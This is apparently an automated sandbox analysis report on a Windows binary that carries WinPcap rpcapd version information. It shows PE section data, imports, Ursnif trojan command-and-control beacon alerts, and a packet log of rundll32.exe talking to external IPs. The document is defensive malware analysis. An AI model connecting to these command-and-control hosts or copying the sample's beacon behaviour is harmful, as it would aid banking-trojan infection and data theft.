| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
| Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x3f170 | 0x40000 | False | 0.371898651123 | data | 4.44682748237 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
| .rdata | 0x41000 | 0x4001b | 0x41000 | False | 0.805322265625 | data | 7.15716511851 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x82000 | 0x14957 | 0x12000 | False | 0.179578993056 | data | 5.40188601701 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
| .idata | 0x97000 | 0xadd | 0x1000 | False | 0.217041015625 | data | 2.64887682924 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
| .rsrc | 0x98000 | 0x703 | 0x1000 | False | 0.1220703125 | data | 1.10395588442 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x99000 | 0x53a5 | 0x6000 | False | 0.152099609375 | data | 5.13419580461 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country |
|---|---|---|---|---|---|
| RT_VERSION | 0x98170 | 0x3d0 | data |
| DLL | Import |
|---|---|
| WINSPOOL.DRV | GetPrinterDriverDirectoryA, GetPrinterDataExW, DeletePrinterConnectionW, FindFirstPrinterChangeNotification, FindClosePrinterChangeNotification |
| msvcrt.dll | toupper |
| USER32.dll | DestroyIcon, GetWindowTextA, DrawFrameControl, LoadAcceleratorsA, GetTitleBarInfo, GetMessageExtraInfo, DrawTextW |
| OLEAUT32.dll | LHashValOfNameSysA |
| SHELL32.dll | FindExecutableW |
| KERNEL32.dll | lstrlenW, GetBinaryTypeW, GetModuleFileNameW, GetModuleHandleW, GetLastError, GetNLSVersion, GetSystemWindowsDirectoryA, lstrcpynA, GetCurrentThread, GetDefaultCommConfigW, ExitProcess, GetSystemDirectoryW, GetCommandLineA, FindNextVolumeMountPointW, DeleteCriticalSection, LockResource, GetCurrentDirectoryA, GetDefaultCommConfigA |
| Secur32.dll | InitializeSecurityContextW |
| ADVAPI32.dll | GetOldestEventLogRecord, FindFirstFreeAce, GetLengthSid, EnumServicesStatusW, RegOpenKeyA, GetPrivateObjectSecurity, GetSecurityDescriptorOwner |
| GDI32.dll | GetCurrentPositionEx, GetBrushOrgEx, GetTextExtentExPointW |
| Description | Data |
|---|---|
| LegalCopyright | Copyright 2005-2007 CACE Technologies. Copyright 2003-2005 NetGroup, Politecnico di Torino. |
| InternalName | rpcapd |
| FileVersion | 4.0.0.1040 |
| CompanyName | CACE Technologies |
| LegalTrademarks | |
| ProductName | WinPcap |
| ProductVersion | 4.0.0.1040 |
| FileDescription | Remote Packet Capture Daemon |
| Build Description | |
| OriginalFilename | rpcapd.exe |
| Translation | 0x0000 0x04b0 |
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node| Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|---|---|---|
| 04/22/22-15:43:57.871629 04/22/22-15:43:57.871629 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49776 | 80 | 192.168.2.5 | 13.107.42.16 |
| 04/22/22-15:44:19.124130 04/22/22-15:44:19.124130 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49788 | 80 | 192.168.2.5 | 146.70.35.138 |
| 04/22/22-15:44:20.140897 04/22/22-15:44:20.140897 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49788 | 80 | 192.168.2.5 | 146.70.35.138 |
| 04/22/22-15:44:18.311066 04/22/22-15:44:18.311066 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49788 | 80 | 192.168.2.5 | 146.70.35.138 |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Apr 22, 2022 15:44:18.286411047 CEST | 49788 | 80 | 192.168.2.5 | 146.70.35.138 |
| Apr 22, 2022 15:44:18.310396910 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.310507059 CEST | 49788 | 80 | 192.168.2.5 | 146.70.35.138 |
| Apr 22, 2022 15:44:18.311065912 CEST | 49788 | 80 | 192.168.2.5 | 146.70.35.138 |
| Apr 22, 2022 15:44:18.334554911 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.672924995 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.672955036 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.672966957 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.673115969 CEST | 49788 | 80 | 192.168.2.5 | 146.70.35.138 |
| Apr 22, 2022 15:44:18.673160076 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.673175097 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.673194885 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.673212051 CEST | 49788 | 80 | 192.168.2.5 | 146.70.35.138 |
| Apr 22, 2022 15:44:18.673213959 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.673228025 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.673258066 CEST | 49788 | 80 | 192.168.2.5 | 146.70.35.138 |
| Apr 22, 2022 15:44:18.673293114 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.673301935 CEST | 49788 | 80 | 192.168.2.5 | 146.70.35.138 |
| Apr 22, 2022 15:44:18.673315048 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.673329115 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.673336983 CEST | 49788 | 80 | 192.168.2.5 | 146.70.35.138 |
| Apr 22, 2022 15:44:18.673362017 CEST | 49788 | 80 | 192.168.2.5 | 146.70.35.138 |
| Apr 22, 2022 15:44:18.673813105 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.673831940 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.673845053 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.673877001 CEST | 49788 | 80 | 192.168.2.5 | 146.70.35.138 |
| Apr 22, 2022 15:44:18.673902988 CEST | 49788 | 80 | 192.168.2.5 | 146.70.35.138 |
| Apr 22, 2022 15:44:18.697171926 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.698338032 CEST | 49788 | 80 | 192.168.2.5 | 146.70.35.138 |
| Apr 22, 2022 15:44:18.713219881 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.713253975 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.713263988 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.713396072 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.713412046 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.713430882 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.713433981 CEST | 49788 | 80 | 192.168.2.5 | 146.70.35.138 |
| Apr 22, 2022 15:44:18.713443995 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.713475943 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.713476896 CEST | 49788 | 80 | 192.168.2.5 | 146.70.35.138 |
| Apr 22, 2022 15:44:18.713493109 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.713495970 CEST | 49788 | 80 | 192.168.2.5 | 146.70.35.138 |
| Apr 22, 2022 15:44:18.713507891 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.713531971 CEST | 49788 | 80 | 192.168.2.5 | 146.70.35.138 |
| Apr 22, 2022 15:44:18.713594913 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.713615894 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.713624001 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.713648081 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.713665009 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.713670969 CEST | 49788 | 80 | 192.168.2.5 | 146.70.35.138 |
| Apr 22, 2022 15:44:18.713680029 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.713726997 CEST | 49788 | 80 | 192.168.2.5 | 146.70.35.138 |
| Apr 22, 2022 15:44:18.713773966 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.713815928 CEST | 49788 | 80 | 192.168.2.5 | 146.70.35.138 |
| Apr 22, 2022 15:44:18.722006083 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.722414017 CEST | 49788 | 80 | 192.168.2.5 | 146.70.35.138 |
| Apr 22, 2022 15:44:18.753236055 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.753271103 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.753283978 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.753302097 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.753314018 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.753432989 CEST | 49788 | 80 | 192.168.2.5 | 146.70.35.138 |
| Apr 22, 2022 15:44:18.753509045 CEST | 49788 | 80 | 192.168.2.5 | 146.70.35.138 |
| Apr 22, 2022 15:44:18.753524065 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.753541946 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.753555059 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.753572941 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.753585100 CEST | 49788 | 80 | 192.168.2.5 | 146.70.35.138 |
| Apr 22, 2022 15:44:18.753619909 CEST | 49788 | 80 | 192.168.2.5 | 146.70.35.138 |
| Apr 22, 2022 15:44:18.753906012 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.753925085 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.753937006 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.753952980 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.753983974 CEST | 49788 | 80 | 192.168.2.5 | 146.70.35.138 |
| Apr 22, 2022 15:44:18.754035950 CEST | 49788 | 80 | 192.168.2.5 | 146.70.35.138 |
| Apr 22, 2022 15:44:18.777646065 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.777815104 CEST | 49788 | 80 | 192.168.2.5 | 146.70.35.138 |
| Apr 22, 2022 15:44:18.793658972 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.793699026 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.793713093 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.793730974 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.793771982 CEST | 49788 | 80 | 192.168.2.5 | 146.70.35.138 |
| Apr 22, 2022 15:44:18.793842077 CEST | 49788 | 80 | 192.168.2.5 | 146.70.35.138 |
| Apr 22, 2022 15:44:18.793865919 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.793908119 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.793911934 CEST | 49788 | 80 | 192.168.2.5 | 146.70.35.138 |
| Apr 22, 2022 15:44:18.793922901 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.793956995 CEST | 49788 | 80 | 192.168.2.5 | 146.70.35.138 |
| Apr 22, 2022 15:44:18.793973923 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.793992996 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.794003963 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.794032097 CEST | 49788 | 80 | 192.168.2.5 | 146.70.35.138 |
| Apr 22, 2022 15:44:18.794238091 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.794259071 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.794270992 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.794302940 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.794305086 CEST | 49788 | 80 | 192.168.2.5 | 146.70.35.138 |
| Apr 22, 2022 15:44:18.794321060 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.794332981 CEST | 80 | 49788 | 146.70.35.138 | 192.168.2.5 |
| Apr 22, 2022 15:44:18.794342995 CEST | 49788 | 80 | 192.168.2.5 | 146.70.35.138 |
| Apr 22, 2022 15:44:18.794390917 CEST | 49788 | 80 | 192.168.2.5 | 146.70.35.138 |
|
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 0 | 192.168.2.5 | 49788 | 146.70.35.138 | 80 | C:\Windows\SysWOW64\rundll32.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| Apr 22, 2022 15:44:18.311065912 CEST | 1303 | OUT | |
| Apr 22, 2022 15:44:18.672924995 CEST | 1304 | IN |